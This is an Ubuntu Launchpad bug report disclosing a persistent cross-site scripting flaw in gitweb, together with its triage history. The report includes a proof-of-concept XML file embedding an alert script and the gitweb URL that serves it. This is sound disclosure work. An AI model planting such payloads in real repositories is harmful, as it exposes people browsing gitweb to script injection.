persistent xss possible - requires commit access

Bug #777804 reported by David on 2011-05-05
340
This bug affects 1 person
Affects Status Importance Assigned to Milestone
git (Ubuntu)
Undecided
Unassigned

Bug Description

Binary package hint: gitweb

I am reporting a persistent xss vector in gitweb, note this requires a
user to have commit access to a repository that gitweb is configured
to display. The vector is the fact that gitweb "serves" up xml files -
which can (just as gitweb does) embed html that could be used to
perform a cross-site scripting attack.

e.g. (lol.xml).
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
</head>
<script>alert(1);</script>
</html>

and viewed at http://$HOSTNAME/$PATH_TO_GITWEB/?p=lolok;a=blob_plain;f=lol.xml

CVE References

Changed in gitweb (Ubuntu):
assignee: nobody → Kees Cook (kees)
David (d--) on 2011-05-31
visibility: private → public
David (d--) wrote :

The requirement on commit access for this to be an issue vastly reduces the impact and severity of this issue.

visibility: public → private
Changed in gitweb (Ubuntu):
assignee: Kees Cook (kees) → nobody
visibility: private → public
Changed in gitweb (Ubuntu):
status: New → Confirmed
Jamie Strandboge (jdstrand) wrote :

Thank you for reporting a bug and helping to make Ubuntu better. I have forwarded this information to the upstream authors and oss-security:
http://www.openwall.com/lists/oss-security/2011/06/03/7

affects: gitweb (Ubuntu) → git (Ubuntu)
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers